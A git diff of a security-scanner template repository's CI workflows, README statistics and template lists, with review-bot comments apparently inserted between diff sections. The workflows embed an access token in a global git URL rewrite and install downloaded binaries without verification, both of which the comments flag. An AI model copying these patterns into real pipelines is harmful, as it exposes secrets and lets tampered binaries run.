diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 3bab5e61f1..49d24413a8 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -58,6 +58,8 @@ We have also added a set of templates to help you understand how things work. Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image") + 💬 Discussion ----- diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index bb4faf2ec2..1253309751 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml 
@@ -10,23 +10,25 @@ jobs: docs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master - with: - persist-credentials: false - fetch-depth: 0 - token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v2 - - uses: actions/setup-go@v2 - with: - go-version: 1.17 + - name: Get Github tag + id: meta + run: | + echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" + + - name: Setup CVE annotate + if: steps.meta.outputs.tag != '' + env: + VERSION: ${{ steps.meta.outputs.tag }} + run: | + wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip + sudo unzip cve-annotate.zip -d /usr/local/bin + working-directory: /tmp - name: Generate CVE Annotations id: cve-annotate run: | - if ! which cve-annotate > /dev/null; then - echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev - fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" @@ -35,6 +37,7 @@ jobs: run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" + git pull git add cves git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a @@ -43,4 +46,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} + branch: ${{ github.ref }} \ No newline at end of file diff --git a/.github/workflows/new-templates.yml b/.github/workflows/new-templates.yml new file mode 100644 index 0000000000..fa398b097e --- /dev/null +++ b/.github/workflows/new-templates.yml 
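Review bot: The guard `if: steps.meta.outputs.tag != ''` on the Setup CVE annotate step does not cover the failure mode of the Get Github tag step just above it: when the unauthenticated call to api.github.com is rate-limited or returns an error document, `jq -r .tag_name` prints the literal string `null`, the guard passes, and the wget line requests `releases/download/null/cve-annotate.zip`. Make a missing tag produce an empty output, `echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r '.tag_name // empty')"`, and consider failing that step outright when the result is empty, because silently skipping the install only moves the failure to the later `cve-annotate -i ./cves/ -d .` line as a command-not-found. The same pair of steps is added in .github/workflows/template-validate.yml, where `${VERSION:1}` would additionally turn `null` into `ull` in the asset name. In both workflows the release zip is unpacked into /usr/local/bin without being compared against the checksum file published alongside the release assets, so a short or substituted download is not detected before the binary runs.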
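Review bot: The added `git pull` runs after cve-annotate has already rewritten files under ./cves but before `git add cves`, so if the remote branch has meanwhile touched any of those files the merge is refused because of uncommitted local changes and the whole Commit step aborts. Moving the pull ahead of the `cve-annotate -i ./cves/ -d .` line in the Generate CVE Annotations step, or committing first and pulling with `git pull --rebase` before the push, avoids that. The step's `name:` line and the surrounding step definition lie outside the hunk.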
@@ -0,0 +1,37 @@ +name: 🥳 New Template List + +on: + push: + branches: + - master + workflow_dispatch: + +jobs: + templates: + runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' + steps: + - uses: actions/checkout@master + with: + token: ${{ secrets.GITHUB_TOKEN }} + persist-credentials: false + fetch-depth: 0 + + - name: Generate new template list + id: new-additions + run: | + git pull + git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions + + - name: Commit files + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git add .new-additions -f + git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a + + - name: Push changes + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml new file mode 100644 index 0000000000..19f985b0c9 --- /dev/null +++ b/.github/workflows/template-db-indexer.yml @@ -0,0 +1,29 @@ +name: 📑 Template-DB Indexer + +on: + push: + branches: + - master + workflow_dispatch: + +jobs: + index: + runs-on: ubuntu-latest + steps: + - uses: actions/setup-go@v2 + with: + go-version: 1.17 + + - name: Intalling Indexer + run: | + git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github + git clone https://github.com/projectdiscovery/nucleish-api.git + cd nucleish-api/cmd/generate-index/ + go install + + - name: Generate Index + env: + AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} + AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }} + run: | + generate-index -mode templates \ No newline at end of file diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 33e2653241..4107c2edcc 100644 --- a/.github/workflows/template-validate.yml 
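Review bot: The Generate new template list step derives its baseline from `$(git tag | tail -n 1)`, but `git tag` lists tags in plain lexicographic order, so once a tag like v10.0.0 exists the last line is still v9.x and the diff is computed against the wrong release. Use the nearest tag reachable from HEAD instead, `git diff --name-only --diff-filter=A $(git describe --tags --abbrev=0) @ . | grep '\.yaml$' | tee .new-additions`, which also anchors the grep so the unescaped `.yaml` no longer matches any file containing "yaml" preceded by any character. Both `actions/checkout@master` and `ad-m/github-push-action@master` are referenced by a mutable branch name in a job that commits and pushes with `GITHUB_TOKEN`; pinning them to a release tag or full commit SHA keeps a later change to those actions from silently altering what this job runs.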
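Review bot: The `git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github` line in the Intalling Indexer step rewrites every URL whose prefix is `https://github`, not only github.com, so the token would be attached to requests for any host whose name merely starts with "github" that a dependency or submodule happens to reference. Bound the rewrite to the one host and path prefix you mean, `git config --global url."https://${GH_TOKEN}@github.com/".insteadOf "https://github.com/"`, with `GH_TOKEN` (name chosen here) supplied through the step's `env:` block rather than expanded into the script text by `${{ }}`, which also keeps the secret out of the literal command that is executed. Unlike new-templates.yml in this same commit, the job carries no `if: github.repository == 'projectdiscovery/nuclei-templates'` guard, so a fork that pushes to master presumably runs it and fails for want of the secrets; worth adding for consistency. The step name also misspells "Installing".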
+++ b/.github/workflows/template-validate.yml @@ -6,24 +6,24 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master - - uses: actions/setup-go@v2 - with: - go-version: 1.17 + - uses: actions/checkout@v2 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go - - - name: Installing Nuclei - if: steps.cache-go.outputs.cache-hit != 'true' + - name: Get Github tag + id: meta run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" + + - name: Setup Nuclei + if: steps.meta.outputs.tag != '' + env: + VERSION: ${{ steps.meta.outputs.tag }} + run: | + wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip + sudo unzip nuclei*.zip -d /usr/local/bin + working-directory: /tmp - name: Template Validation run: | + cp -r ${{ github.workspace }} $HOME nuclei -validate -t . nuclei -validate -w ./workflows \ No newline at end of file diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index ae4e49a7b8..ff91ce30ed 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,6 +1,9 @@ name: 🗒 Templates Stats on: + push: + tags: + - '*' workflow_dispatch: jobs: @@ -49,4 +52,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} \ No newline at end of file + branch: master \ No newline at end of file diff --git a/.new-additions b/.new-additions new file mode 100644 index 0000000000..646fa8d459 --- /dev/null +++ b/.new-additions 
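Review bot: The new `cp -r ${{ github.workspace }} $HOME` line in the Template Validation step has no visible consumer in the hunk: both `nuclei -validate` invocations run against `.` and `./workflows` in the default working directory, and nothing in the step refers to the copy. If the intent is to seed nuclei's default template location so that `-validate` does not try to fetch templates at start-up, that is not evident from the code and deserves a comment on the line, e.g. `# copy the checkout to $HOME/<repo> so nuclei finds templates locally (confirm this is still required)`; otherwise the line should go. The `sudo unzip nuclei*.zip -d /usr/local/bin` glob in the Setup Nuclei step installs whatever zip archives happen to be in /tmp rather than the one just downloaded; naming the file explicitly, `nuclei_${VERSION:1}_linux_amd64.zip`, keeps an unrelated archive on the runner from being unpacked into the PATH.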
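Review bot: With the trigger extended to `push: tags: - '*'` in the first hunk, changing the push target to `branch: master` in the second is only safe if the commit being pushed descends from the current master. On a tag push the checkout is the tagged commit, so if master has advanced since the tag was cut the push is rejected as non-fast-forward; the checkout and commit steps are outside the hunk, so whether they pull master first cannot be seen here. Either check out `ref: master` explicitly in the checkout step when the workflow was started by a tag, or run `git pull --rebase origin master` before the push action.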
@@ -0,0 +1,14 @@ +cves/2013/CVE-2013-6281.yaml +cves/2018/CVE-2018-18608.yaml +cves/2019/CVE-2019-18371.yaml +cves/2021/CVE-2021-45428.yaml +cves/2022/CVE-2022-0346.yaml +cves/2022/CVE-2022-21500.yaml +exposed-panels/jupyter-notebook.yaml +exposed-panels/looker-panel.yaml +exposures/files/xampp-environment-variables.yaml +miscellaneous/robots-txt-endpoint.yaml +ssl/self-signed-ssl.yaml +token-spray/api-debounce.yaml +token-spray/api-tatum.yaml +vulnerabilities/dedecms/dedecms-config-xss.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index bef00b4d7a..832ecac550 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -7,10 +7,12 @@ # tags is a list of tags to ignore execution for # unless asked for by the user. -tags: +tags: - "fuzz" - "dos" - - "misc" # files is a list of files to ignore template execution # unless asked for by the user. + +# files: +# - cves/2020/CVE-2020-35489.yaml diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 64b9408cf0..ccc3257d16 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -60,7 +60,7 @@ git add . git commit -m "Added/Fixed/Updated XXX Template" ``` -**NOTE**: +**NOTE**: - A Pull Request should have only one unique template to make it simple for review. - Multiple templates for same technology can be grouped into single Pull Request. diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md index e2ad854090..4afd08ad18 100644 --- a/PULL_REQUEST_TEMPLATE.md +++ b/PULL_REQUEST_TEMPLATE.md 
@@ -24,5 +24,5 @@ I've validated this template locally? - [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/) - [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) -- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md) +- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md) - [PD-Community Discord server](https://discord.gg/projectdiscovery) \ No newline at end of file diff --git a/README.md b/README.md index d7f5cd6a7a..8274ffaff9 100644 --- a/README.md +++ b/README.md 
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | -**190 directories, 2663 files**. +**262 directories, 3566 files**. 
@@ -71,6 +71,8 @@ We have also added a set of templates to help you understand how things work. Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image") + 💬 Discussion ----- diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 215b5d9e4a..96176976a3 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json 
@@ -1 +1 @@ -{"tags":[{"name":"cve","count":907},{"name":"lfi","count":377},{"name":"panel","count":318},{"name":"xss","count":283},{"name":"wordpress","count":270},{"name":"exposure","count":250},{"name":"rce","count":230},{"name":"tech","count":223},{"name":"cve2021","count":188},{"name":"wp-plugin","count":186},{"name":"cve2020","count":171},{"name":"joomla","count":128},{"name":"token-spray","count":127},{"name":"cve2010","count":109},{"name":"cve2019","count":106},{"name":"cve2018","count":101},{"name":"config","count":100},{"name":"iot","count":84},{"name":"oast","count":80},{"name":"apache","count":80},{"name":"default-login","count":71},{"name":"takeover","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"unauth","count":57},{"name":"cve2017","count":56},{"name":"ssrf","count":47},{"name":"sqli","count":46},{"name":"network","count":45},{"name":"","count":44},{"name":"oracle","count":41},{"name":"misconfig","count":41},{"name":"cve2016","count":40},{"name":"redirect","count":38},{"name":"logs","count":34},{"name":"cve2015","count":31},{"name":"google","count":31},{"name":"jira","count":30},{"name":"cisco","count":29},{"name":"atlassian","count":29},{"name":"listing","count":29},{"name":"cve2014","count":28},{"name":"auth-bypass","count":27},{"name":"router","count":26},{"name":"generic","count":24},{"name":"disclosure","count":22},{"name":"misc","count":21},{"name":"aem","count":20},{"name":"cve2012","count":19},{"name":"debug","count":19},{"name":"login","count":19},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"wp-theme","count":16},{"name":"weblogic","count":16},{"name":"aws","count":15},{"name":"cve2011","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"deserialization","count":14},{"name":"struts","count":14},{"name":"cve2009","count":14},{"name":"adobe","count":14},{"name":"dns","count":13},{"name":"intrusive","count":13},{"name":"dlink","count":13},{"nam
e":"android","count":13},{"name":"manageengine","count":12},{"name":"zoho","count":12},{"name":"xxe","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"hp","count":11},{"name":"ibm","count":11},{"name":"magento","count":11},{"name":"microsoft","count":11},{"name":"dell","count":10},{"name":"cve2008","count":9},{"name":"fastjson","count":9},{"name":"gitlab","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"cms","count":9},{"name":"airflow","count":9},{"name":"kubernetes","count":9},{"name":"rails","count":9},{"name":"fileupload","count":9},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"ruijie","count":8},{"name":"backup","count":8},{"name":"netgear","count":8},{"name":"coldfusion","count":8},{"name":"files","count":7},{"name":"solr","count":7},{"name":"confluence","count":7},{"name":"prometheus","count":7},{"name":"camera","count":7},{"name":"django","count":7},{"name":"jetty","count":6},{"name":"sitecore","count":6},{"name":"go","count":6},{"name":"drupal","count":6},{"name":"glpi","count":6},{"name":"squirrelmail","count":6},{"name":"api","count":6},{"name":"lucee","count":6},{"name":"laravel","count":6},{"name":"nodejs","count":6},{"name":"jolokia","count":6},{"name":"grafana","count":6},{"name":"windows","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"phpmyadmin","count":6},{"name":"citrix","count":6},{"name":"iis","count":5},{"name":"wso2","count":5},{"name":"headless","count":5},{"name":"printer","count":5},{"name":"gocd","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"minio","count":5},{"name":"fatpipe","count":5},{"name":"symfony","count":5},{"name":"ssti","count":5},{"name":"thinkphp","count":5},{"name":"dedecms","count":5},{"name":"exchange","count":5},{"name":"java","count":5},{"name":"git","count":5},{"name":"circarlife","count":5},{"name":"hongdian","count":4},{"name":"vpn","count":4},{"name":"symantec","co
unt":4},{"name":"artifactory","count":4},{"name":"buffalo","count":4},{"name":"webserver","count":4},{"name":"proxy","count":4},{"name":"zabbix","count":4},{"name":"rfi","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"microstrategy","count":4},{"name":"asp","count":4},{"name":"opensis","count":4},{"name":"firebase","count":4},{"name":"slack","count":4},{"name":"enum","count":4},{"name":"zimbra","count":4},{"name":"moodle","count":4},{"name":"panos","count":4},{"name":"magmi","count":4},{"name":"keycloak","count":4},{"name":"bigip","count":4},{"name":"amazon","count":4},{"name":"cve2007","count":4},{"name":"npm","count":4},{"name":"jellyfin","count":4},{"name":"strapi","count":4},{"name":"samsung","count":4},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"firmware","count":4},{"name":"wcs","count":4},{"name":"resin","count":4},{"name":"maps","count":4},{"name":"zhiyuan","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"smtp","count":3},{"name":"sql","count":3},{"name":"vbulletin","count":3},{"name":"kafka","count":3},{"name":"itop","count":3},{"name":"sonicwall","count":3},{"name":"ebs","count":3},{"name":"linkerd","count":3},{"name":"db","count":3},{"name":"hashicorp","count":3},{"name":"ssh","count":3},{"name":"nexus","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"terramaster","count":3},{"name":"smb","count":3},{"name":"hoteldruid","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"mail","count":3},{"name":"activemq","count":3},{"name":"axigen","count":3},{"name":"azure","count":3},{"name":"tikiwiki","count":3},{"name":"httpd","count":3},{"name":"lansweeper","count":3},{"name":"log","count":3},{"name":"movable","count":3},{"name":"nacos","count":3},{"name":"springcloud","count":3},{"name":"cacti","count":3},{"name":"fpd","count":3},{"name":"openam","count":3},{"name":"ampps","count":3},{"name":"cloud","count":3},{"name":"expo
sures","count":3},{"name":"pentaho","count":3},{"name":"kibana","count":3},{"name":"r-seenet","count":3},{"name":"jeesns","count":3},{"name":"targa","count":3},{"name":"druid","count":3},{"name":"oa","count":3},{"name":"bitrix","count":3},{"name":"node","count":3},{"name":"cves","count":3},{"name":"icewarp","count":3},{"name":"spring","count":3},{"name":"lfr","count":3},{"name":"ofbiz","count":3},{"name":"kevinlab","count":3},{"name":"gogs","count":3},{"name":"openssh","count":3},{"name":"mongodb","count":3},{"name":"nosqli","count":3},{"name":"fanruan","count":3},{"name":"globalprotect","count":2},{"name":"liferay","count":2},{"name":"jetbrains","count":2},{"name":"hasura","count":2},{"name":"trixbox","count":2},{"name":"service","count":2},{"name":"mida","count":2},{"name":"upload","count":2},{"name":"idrac","count":2},{"name":"bypass","count":2},{"name":"bucket","count":2},{"name":"synology","count":2},{"name":"prtg","count":2},{"name":"guacamole","count":2},{"name":"odoo","count":2},{"name":"maian","count":2},{"name":"status","count":2},{"name":"jsf","count":2},{"name":"frontpage","count":2},{"name":"spark","count":2},{"name":"rocketchat","count":2},{"name":"linksys","count":2},{"name":"dolibarr","count":2},{"name":"chyrp","count":2},{"name":"glassfish","count":2},{"name":"openvpn","count":2},{"name":"cache","count":2},{"name":"places","count":2},{"name":"qcubed","count":2},{"name":"openfire","count":2},{"name":"cve2005","count":2},{"name":"idea","count":2},{"name":"bitly","count":2},{"name":"phpcollab","count":2},{"name":"yapi","count":2},{"name":"ems","count":2},{"name":"getsimple","count":2},{"name":"rstudio","count":2},{"name":"sharepoint","count":2},{"name":"grav","count":2},{"name":"aruba","count":2},{"name":"geowebserver","count":2},{"name":"zeroshell","count":2},{"name":"myfactory","count":2},{"name":"prestashop","count":2},{"name":"pega","count":2},{"name":"waf","count":2},{"name":"dos","count":2},{"name":"kong","count":2},{"name":"axis2","count":2},{"n
ame":"showdoc","count":2},{"name":"akamai","count":2},{"name":"graphql","count":2},{"name":"fortinet","count":2},{"name":"qihang","count":2},{"name":"nextjs","count":2},{"name":"jboss","count":2},{"name":"ec2","count":2},{"name":"totemomail","count":2},{"name":"gitea","count":2},{"name":"metabase","count":2},{"name":"linux","count":2},{"name":"bruteforce","count":2},{"name":"cve2006","count":2},{"name":"axis","count":2},{"name":"plesk","count":2},{"name":"netsweeper","count":2},{"name":"avantfax","count":2},{"name":"mailchimp","count":2},{"name":"igs","count":2},{"name":"tidb","count":2},{"name":"ruby","count":2},{"name":"wuzhicms","count":2},{"name":"ilo","count":2},{"name":"forcepoint","count":2},{"name":"linkedin","count":2},{"name":"phpstorm","count":2},{"name":"xxljob","count":2},{"name":"s3","count":2},{"name":"yii","count":2},{"name":"harbor","count":2},{"name":"commax","count":2},{"name":"influxdb","count":2},{"name":"rockmongo","count":2},{"name":"voipmonitor","count":2},{"name":"text","count":2},{"name":"middleware","count":2},{"name":"rancher","count":2},{"name":"chamilo","count":2},{"name":"redis","count":2},{"name":"wordfence","count":2},{"name":"justwriting","count":2},{"name":"aviatrix","count":2},{"name":"vcenter","count":2},{"name":"sonarqube","count":2},{"name":"ecology","count":2},{"name":"shellshock","count":2},{"name":"payara","count":2},{"name":"nextcloud","count":2},{"name":"python","count":2},{"name":"favicon","count":2},{"name":"splunk","count":2},{"name":"ad","count":2},{"name":"resourcespace","count":2},{"name":"electron","count":2},{"name":"webcam","count":2},{"name":"pgadmin","count":2},{"name":"mcafee","count":2},{"name":"embed","count":2},{"name":"frp","count":2},{"name":"aspose","count":2},{"name":"rackstation","count":2},{"name":"lotus","count":2},{"name":"emerge","count":2},{"name":"netis","count":2},{"name":"openemr","count":2},{"name":"chiyu","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"seeyon","count
":2},{"name":"huawei","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"gitlist","count":2},{"name":"vrealize","count":2},{"name":"saltstack","count":2},{"name":"hpe","count":2},{"name":"heroku","count":2},{"name":"rosariosis","count":2},{"name":"flir","count":2},{"name":"ecoa","count":2},{"name":"hostheader-injection","count":2},{"name":"ucmdb","count":2},{"name":"neos","count":2},{"name":"backups","count":2},{"name":"centos","count":2},{"name":"nagios","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"hikvision","count":2},{"name":"leak","count":2},{"name":"natshell","count":2},{"name":"akkadian","count":2},{"name":"storage","count":2},{"name":"asana","count":1},{"name":"nerdgraph","count":1},{"name":"node-red-dashboard","count":1},{"name":"doh","count":1},{"name":"smartsense","count":1},{"name":"spinnaker","count":1},{"name":"elasticsearch","count":1},{"name":"twitter-server","count":1},{"name":"spotify","count":1},{"name":"place","count":1},{"name":"jmx","count":1},{"name":"dwr","count":1},{"name":"elascticsearch","count":1},{"name":"accuweather","count":1},{"name":"digitalocean","count":1},{"name":"abuseipdb","count":1},{"name":"wifisky","count":1},{"name":"mod-proxy","count":1},{"name":"blackboard","count":1},{"name":"scs","count":1},{"name":"csrfguard","count":1},{"name":"sgp","count":1},{"name":"logontracer","count":1},{"name":"raspap","count":1},{"name":"cloudron","count":1},{"name":"buttercms","count":1},{"name":"timezone","count":1},{"name":"tieline","count":1},{"name":"openrestry","count":1},{"name":"dompdf","count":1},{"name":"gsoap","count":1},{"name":"skywalking","count":1},{"name":"lokalise","count":1},{"name":"wordcloud","count":1},{"name":"covalent","count":1},{"name":"speed","count":1},{"name":"seeddms","count":1},{"name":"actuator","count":1},{"name":"zenario","count":1},{"name":"graph","count":1},{"name":"yachtcontrol","count":1},{"na
me":"calendly","count":1},{"name":"biometrics","count":1},{"name":"ricoh","count":1},{"name":"nps","count":1},{"name":"softaculous","count":1},{"name":"cliniccases","count":1},{"name":"opensmtpd","count":1},{"name":"feifeicms","count":1},{"name":"edgeos","count":1},{"name":"okiko","count":1},{"name":"whm","count":1},{"name":"solman","count":1},{"name":"sprintful","count":1},{"name":"jabber","count":1},{"name":"natemail","count":1},{"name":"phalcon","count":1},{"name":"tika","count":1},{"name":"mapbox","count":1},{"name":"dribbble","count":1},{"name":"imap","count":1},{"name":"zcms","count":1},{"name":"iterable","count":1},{"name":"ntopng","count":1},{"name":"jumpcloud","count":1},{"name":"bash","count":1},{"name":"expressjs","count":1},{"name":"solarlog","count":1},{"name":"ns","count":1},{"name":"nifi","count":1},{"name":"zte","count":1},{"name":"tcexam","count":1},{"name":"thecatapi","count":1},{"name":"strava","count":1},{"name":"vsphere","count":1},{"name":"expn","count":1},{"name":"weather","count":1},{"name":"shopizer","count":1},{"name":"supervisor","count":1},{"name":"xml","count":1},{"name":"empirecms","count":1},{"name":"webui","count":1},{"name":"myanimelist","count":1},{"name":"thinkadmin","count":1},{"name":"redmine","count":1},{"name":"zend","count":1},{"name":"loytec","count":1},{"name":"pagespeed","count":1},{"name":"circle","count":1},{"name":"stem","count":1},{"name":"scimono","count":1},{"name":"rhymix","count":1},{"name":"wakatime","count":1},{"name":"sureline","count":1},{"name":"adiscon","count":1},{"name":"openx","count":1},{"name":"memcached","count":1},{"name":"varnish","count":1},{"name":"secmail","count":1},{"name":"mirai","count":1},{"name":"livezilla","count":1},{"name":"tarantella","count":1},{"name":"woocommerce","count":1},{"name":"pulsesecure","count":1},{"name":"maxsite","count":1},{"name":"phpfastcache","count":1},{"name":"scanii","count":1},{"name":"xiuno","count":1},{"name":"starttls","count":1},{"name":"ambari","count":1},{"name
":"wondercms","count":1},{"name":"jwt","count":1},{"name":"allied","count":1},{"name":"autocomplete","count":1},{"name":"oneblog","count":1},{"name":"processmaker","count":1},{"name":"blind","count":1},{"name":"wiki","count":1},{"name":"craftcms","count":1},{"name":"binance","count":1},{"name":"cofax","count":1},{"name":"calendarix","count":1},{"name":"email","count":1},{"name":"wazuh","count":1},{"name":"cloudflare","count":1},{"name":"tapestry","count":1},{"name":"mariadb","count":1},{"name":"leanix","count":1},{"name":"bullwark","count":1},{"name":"k8","count":1},{"name":"chevereto","count":1},{"name":"locations","count":1},{"name":"svnserve","count":1},{"name":"pmb","count":1},{"name":"landray","count":1},{"name":"chinaunicom","count":1},{"name":"fiori","count":1},{"name":"lighttpd","count":1},{"name":"mobileiron","count":1},{"name":"accela","count":1},{"name":"circleci","count":1},{"name":"shenyu","count":1},{"name":"nownodes","count":1},{"name":"plastic","count":1},{"name":"cooperhewitt","count":1},{"name":"stripe","count":1},{"name":"smi","count":1},{"name":"flexbe","count":1},{"name":"umbraco","count":1},{"name":"skycaiji","count":1},{"name":"spip","count":1},{"name":"tink","count":1},{"name":"synnefo","count":1},{"name":"csod","count":1},{"name":"plc","count":1},{"name":"rijksmuseum","count":1},{"name":"visualtools","count":1},{"name":"lanproxy","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"javamelody","count":1},{"name":"deviantart","count":1},{"name":"shadoweb","count":1},{"name":"adoptapet","count":1},{"name":"sar2html","count":1},{"name":"duomicms","count":1},{"name":"servicedesk","count":1},{"name":"olivetti","count":1},{"name":"alienvault","count":1},{"name":"zmanda","count":1},{"name":"redwood","count":1},{"name":"st","count":1},{"name":"oscommerce","count":1},{"name":"mantisbt","count":1},{"name":"adb","count":1},{"name":"bedita","count":1},{"name":"terraform","count":1},{"name":"froxlor","count":1},{"name":"traefik","cou
